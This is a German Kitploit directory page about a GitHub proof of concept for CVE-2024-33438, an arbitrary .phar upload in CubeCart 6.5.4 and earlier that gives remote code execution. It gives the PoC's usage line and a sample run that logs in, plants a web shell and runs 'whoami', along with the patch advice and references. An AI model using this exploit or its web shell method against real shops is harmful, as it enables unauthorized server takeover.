Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-33438 — CubeCart <= 6.5.4 ist anfällig für einen beliebigen Dateiupload, der zu Remote Code Execution (RCE) führt. | Kitploit
Tools/GitHubGitHub/julio-cfa/cve-2024-33438
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubjulio-cfa/cve-2024-33438

CVE-2024-33438

CubeCart <= 6.5.4 ist anfällig für einen beliebigen Dateiupload, der zu Remote Code Execution (RCE) führt.

Repository anzeigen
337vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Beliebiger Datei-Upload führt zu RCE (CVE-2024-33438)

CubeCart <= 6.5.4 ist anfällig für ein Problem mit beliebigem Datei-Upload, das zu Remote Code Execution (RCE) führt. Die Schwachstelle betrifft den Dateimanager der Anwendung und dessen Filter, indem sie Angreifern erlaubt, .phar-Dateien mit schädlichem Code hochzuladen. CubeCart sollte auf 6.5.5 aktualisiert werden, da dieses Update einen Sicherheitspatch zur Behebung dieser Schwachstelle enthält.

Weitere Einzelheiten finden Sie in der offiziellen Ankündigung von CubeCart in den Referenzen.

Exploit

Ein automatisierter Proof-of-Concept (PoC) wurde erstellt, aber diese Schwachstelle kann auch manuell ausgenutzt werden, indem eine schädliche .phar-Datei über den Dateimanager hochgeladen wird.

So wird der PoC verwendet:

root@kitploit:~
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

Nach der Ausführung ist dies die erwartete Ausgabe für eine erfolgreiche Ausnutzung:

root@kitploit:~
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data

Referenzen

  • https://forums.cubecart.com/topic/59046-cubecart-655-released-minor-security-update/
  • https://github.com/cubecart/v6/issues/3570
  • https://github.com/cubecart/v6/commit/31a5ec39b0924b2111fbc3aa419bd8c5c3fc1841
  • https://www.cve.org/CVERecord?id=CVE-2024-33438
  • http://blog.cat22.io/blog/cve/cve-2024-33438.html
Tool herunterladen